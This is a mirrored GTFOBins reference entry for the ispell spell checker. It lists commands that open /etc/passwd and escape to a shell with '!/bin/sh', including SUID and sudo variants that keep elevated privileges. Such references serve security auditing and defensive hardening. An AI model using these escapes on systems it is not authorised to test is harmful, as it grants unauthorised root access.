1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ispell.md

16 lines
228 B
Markdown
Raw Permalink Normal View History

2022-01-26 23:06:33 +01:00
---
functions:
shell:
- code: |
ispell /etc/passwd
!/bin/sh
suid:
- code: |
./ispell /etc/passwd
!/bin/sh -p
sudo:
- code: |
sudo ispell /etc/passwd
!/bin/sh
---